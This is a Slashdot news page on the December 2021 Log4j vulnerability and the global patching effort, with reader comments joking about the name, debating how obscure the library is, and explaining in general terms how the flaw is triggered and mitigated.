Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Security

Software Flaw Sparks Global Race To Patch Bug (wsj.com) 60

Companies and governments around the world rushed over the weekend to fend off cyberattacks looking to exploit a serious flaw in a widely used piece of Internet software that security experts warn could give hackers sweeping access to networks. From a report: Cybersecurity researchers said the bug, hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency issued an urgent alert about the vulnerability and urged companies to take action. CISA Director Jen Easterly said on Saturday, "To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector." Germany's cybersecurity organization over the weekend issued a "red alert" about the bug. Australia called the issue "critical."

Security experts warned that it could take weeks or more to assess the extent of the damage and that hackers exploiting the vulnerability could access sensitive data on networks and install back doors they could use to maintain access to servers even after the flawed software has been patched. "It is one of the most significant vulnerabilities that I've seen in a long time," said Aaron Portnoy, principal scientist with the security firm Randori. Security experts noted that many companies have other processes in place that would prevent a malicious hacker from running software and breaking into these companies, potentially limiting the fallout from the bug. Microsoft, in an alert to customers, said "attackers are probing all endpoints for vulnerability." Amazon.com, Twitter and Cisco were among the companies that have said they were carrying out investigations into the depth of the problem. Amazon, the world's biggest cloud computing company, said in a security alert, "We are actively monitoring this issue, and are working on addressing it."

This discussion has been archived. No new comments can be posted.

Software Flaw Sparks Global Race To Patch Bug

Comments Filter:
  • by fahrbot-bot ( 874524 ) on Monday December 13, 2021 @02:33PM (#62076489)

    Just upgrade from Log4j to Log4k -- the version number is base 36, right?

    • by VaccinesCauseAdults ( 7114361 ) on Monday December 13, 2021 @02:43PM (#62076529)
      No, Log4j() calculates the logarithm to base 4j, that is four times the unit imaginary number (engineering notation).

      For a complex input z, Log4j(z) returns the complex number w such that (4j)^w = z.

      It is a rare but important function alongside the more common ones: Log2(), LogE() and Log10().

    • Re: (Score:3, Informative)

      by Tablizer ( 95088 )

      Or Log4j++ blockchain microservice edge cloud web-assembly. If you are going to be hacked, get hacked by the "in" crowd to be cool.

      • Or Log4j++ blockchain microservice edge cloud web-assembly. If you are going to be hacked, get hacked by the "in" crowd to be cool.

        I'll be even cooler once I buy the NFT of the buggy library.

  • Love the title (Score:5, Insightful)

    by saloomy ( 2817221 ) on Monday December 13, 2021 @02:33PM (#62076493)
    It is not like the name of the package, versions, or prevalence is important. Just that there is a bug. Nothing else is important information.
    • hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks.

      Sounds a little rushed to press -- "obscure" and "widely used" doesn't really jibe [merriam-webster.com].

      • Re: Love the title (Score:5, Insightful)

        by NagrothAgain ( 4130865 ) on Monday December 13, 2021 @03:01PM (#62076639)
        If by "rushed to press" you meant "lazily posted 4 days after the rest of the tech world started widely discussing and panicking over it" then yes, that would be accurate.
      • Re:Love the title (Score:4, Insightful)

        by Anonymous Coward on Monday December 13, 2021 @03:39PM (#62076801)

        "obscure" and "widely used" doesn't really jibe

        Most know about "TCP ports", despite that there are TWO ports in a TCP header, the "destination port" being the one most know about.

        The "source port" is practically unknown of by anyone with extensive networking experience/knowledge, making it "obscure"
        Yet it is used within every TCP packet ever generated, making it also "widely used"

        On topic, until last Friday, I had no idea Java didn't include a logging function of its own and to get even the most basic text file debugging requires an external library to do it.
        I'd dare say nearly all non-java programmers were likely just as unaware.

        Even having installed a couple java based programs in my time, the realization that not just the program, but its dependencies, those dependencies dependencies, and so on, have independently opted to use the same non-1st-party logging library, is mind boggling.

        It's very fair to say this library is obscure.
        That it keeps popping up in so many different programs also makes it widely used, even if entirely unbeknownst to those using the program.

      • Re:Love the title (Score:4, Insightful)

        by Pascoea ( 968200 ) on Monday December 13, 2021 @04:17PM (#62076947)

        "obscure" and "widely used" doesn't really jibe

        Not may people can tell you what palladium is, but anyone that has driven a car has used it. Obscure: not discovered or known about; uncertain. That could apply to thousands of thigs that are used every day that contain things most people don't know about.

        • by bn-7bc ( 909819 )
          Hmm I can't say I know a lot about palladium other than it being a metal I think) and bieing found somewhere in the right half of the periodic table, but then again I'm no cemist
      • Re:Love the title (Score:4, Insightful)

        by nagora ( 177841 ) on Monday December 13, 2021 @04:56PM (#62077077)

        hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks.

        Sounds a little rushed to press -- "obscure" and "widely used" doesn't really jibe [merriam-webster.com].

        This is the curse of giant dependency trees - things can be used for years without most people knowing they're there. Then one day the boat sinks because there's a hole in it.

    • Re:Love the title (Score:5, Informative)

      by EvilSS ( 557649 ) on Monday December 13, 2021 @03:34PM (#62076777)
      Here is the CVE for it (which should be mandatory for /. summaries of bugs but hey, let's link to the pay-walled WSJ instead!): https://cve.mitre.org/cgi-bin/... [mitre.org]

      Affected versions 2.14.1 and below.
      • Supposedly it was introduced in one of the 2.0. betas.
        • Supposedly it was introduced in one of the 2.0. betas.

          It's a bit deeper than that (since the exploit depends on JNDI lookups being turned on in Log4J).

          There's no known exploit risks with versions 1.x, but the possibility remains. SLF4J suggests a physical remediation (by removing the JMSAppender class from the log4j jar artifacts.) See link below for details:

          http://slf4j.org/log4shell.html [slf4j.org]

          If it were up to me and happened to control a system depending on Log4J 1.x, I would do that remediation rather than run the risk.

    • If you rely on Slashdot for timely informing of vulnerabilities you need to revise your security systems.
  • " ....hidden in an obscure piece of server software called Log4j....", right. Well, that's one way to classify it...written by someone who probably hasn't got a clue what Log4j is but with these words tries to get it on some prohibition list or something. And something of value was lost if that happens.
  • by oh_my_080980980 ( 773867 ) on Monday December 13, 2021 @02:50PM (#62076577)
    That means until the next security exploit is found...
    • Re: (Score:2, Interesting)

      by EvilSS ( 557649 )
      This isn't just the cloud. There are tons of on-prem products left vulnerable by it. And you don't need direct internet access inbound to trigger it. You just need to get something using a vulnerable version of the component to log a string you craft. For example a IDS or proxy server that uses this component to write out their logs, by feeding a crafted string back to a user requesting a website that you know an affected product will log. Other systems that need to be web facing like customer support chat
    • by flink ( 18449 )

      This is a vulnerability in a logging library. Any service you built yourself that used this library would be vulnerable, cloud or no.

  • You ask the log server to execute the code.

  • I'm no Java coder at all, and even I, I have heard of log4j.
  • by Junta ( 36770 ) on Monday December 13, 2021 @03:09PM (#62076699)

    The vulnerability was in the ability to load Java class file over LDAP. As well as being a horrible vulnerability, the whole capability sounds like the fever dream of an 'enterprise' software architect.

    • Another idiot with vision.

    • At this point, I would recommend everyone moving away from log4j. Now that one vuln was found, over the next few months a lot of attention will be focused on it, with likely more found.

      All you need for logging is the ability to redirect stdout/stderr to wherever you want it. There's no need for a massive library, and Java has an adequate native logging solution now.

      • by udittmer ( 89588 )

        "adequate" is in the eye of the beholder. When java.util.logging came out in 2002, even the log4j version then in existence was considered superior. It still is, even though wrappers like slf4j are now in common use to handle the variety of logging mechanisms.

  • by Bookwyrm ( 3535 ) on Monday December 13, 2021 @03:29PM (#62076757)

    One aspect of this vulnerability is that the attacker does not need to have opened or connected directly to the vulnerable Java program. The Java program just has to be exposed to an exploit string from *some* source such that the program logs it with a vulnerable version of log4j. At which point the program opens its own outbound connection to the exploit server. (The port number can be specified to 80 or 443 so it looks like outbound HTTP or HTTPS traffic, so just blocking outbound connections to LDAP default ports won't save you.)

    So I have moderate expectations that there will be a burst of systems exploited at the end of the month when automated billing/accounting/auditing/etc. systems start processing this month's data for the end of month or end of year reporting. It will be something like the software which drives the business bulk mailing label printer or something -- some minor Java utility that has nothing at all to do with the network -- somewhere in the processing chain which will dutifully try to execute the exploit.

    • It seems pretty dumb to allow an enterprise system unfettered outgoing access to the internet. Put it through a proxy and only allow it to connect to domain/port that it needs to for functionality. Often that would be none.
      • You should not let traffic leave your intranet except to known hosts (personal computers of course are different). The firewall to do this is easy to set up, but for some reason a lot of people don't do it.

      • by EvilSS ( 557649 )

        Put it through a proxy and only allow it to connect to domain/port that it needs to for functionality.

        So does that proxy server keep logs? If so, what component does it use for those logs? Could it be using Log4j? Woops!

        And it doesn't even need to be internet connected at all. There are already examples of people triggering the bug in network systems by changing the name of their phones. Many enterprise wifi systems will log connection attempts, even unsuccessful ones. Someone could walk into a lobby and execute arbitrary code on a network by just having their phone try to connect to the company wifi. T

    • The kind of exploit you describe is often called a "reverse shell," in case you want to look up more about it.

  • All you need really is 1 bit hole in code that gives access to the system. I mean 1 bit hole! After that 4Ghz processor can inject anything in split second. Bit by Bit. In other news (Hold my beer): Microsoft is using DNA for data storage. Lets hope API is secure and no bit holes. Would be nasty to have malware or ransomware in DNA database, eh?
  • WSJ, really?! (Score:5, Informative)

    by EvilSS ( 557649 ) on Monday December 13, 2021 @03:42PM (#62076811)
    Does /. have some kind of referral deal with WSJ or something? WHY THE FUCK is something like this, with literally hundreds of articles from hundreds of sites, not to mention the CVE (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 btw), linked off to only a paywalled, non-tech site in the summary??

    Here are a few githubs tracking affected products:

    https://github.com/authomize/log4j-log4shell-affected/blob/main/affected_apps.md

    https://github.com/authomize/log4j-log4shell-affected/blob/main/affected_components.md

    https://gist.github.com/SwitHa... [github.com]

    And some news articles

    https://nakedsecurity.sophos.c... [sophos.com]

    https://www.engadget.com/log4s... [engadget.com]

    https://www.infoworld.com/arti... [infoworld.com]
    • to look for signs of exploitation.

      https://gist.github.com/Neo23x... [github.com]
    • Re:WSJ, really?! (Score:4, Insightful)

      by kbahey ( 102895 ) on Monday December 13, 2021 @05:53PM (#62077237) Homepage

      Does /. have some kind of referral deal with WSJ or something? WHY THE FUCK is something like this, with literally hundreds of articles from hundreds of sites

      I have said this before:

      There has to be such a deal ...
      Not only with WSJ, but also Bloomberg and the NY Times.
      All are behind a paywall, or require a subscription, yet, /. editors keep posting articles with links to them ...

      Newsflash: Slashdotters will not subscribe to WSJ nor Bloomberg just because . / keeps posting links to them ...

      I understand they need to make money, but not at the expense of pissing off their audience.

    • Re:WSJ, really?! (Score:4, Insightful)

      by mrthoughtful ( 466814 ) on Monday December 13, 2021 @06:17PM (#62077313) Journal
      I think it’s more likely to be even simpler than that: it’s more likely that the person who submits the article works for said paper. The number of article that refer to pisspoor blogs is unreal - and often the news is available from a zillion better places. Try it out for yourself: create a silly blog, take any half-interesting press release from EurekaAlert (especially Space or Maths or IT or AI or Nanitech or engineering) - write a stupid blog entry about it and then submit to slashdot. 9 of 10 editors will give a cursory glance at your blog - consider it newsworthy - and post
  • "A zero-day vulnerability .. was found .. on November 24, 2021 .. The feature .. had been removed .. on December 6, 2021" ref [wikipedia.org]
    • by pjt33 ( 739471 )

      That's quite fast, compared to some...

      My boss forwarded an e-mail from the supplier of some middleware we use. In essence, they say "We're not vulnerable to this because the bug was introduced in version 2.0-beta9 and we use an earlier version". 2.0-beta9 came out more than 8 years ago [apache.org].

  • "We will only minimize potential impacts through collaborative efforts between government and the private sector."

    Right, because all the companies that have been scrambling and remediating this ASAFP needed the government (pick one, any one) to help out?

  • by thsths ( 31372 ) on Tuesday December 14, 2021 @03:55AM (#62078349)

    I thought it works as documented. Now the documented default behaviour may be very risky from a security perspective, so it may be a bad idea, but it is not a bug.

If all else fails, lower your standards.

Working...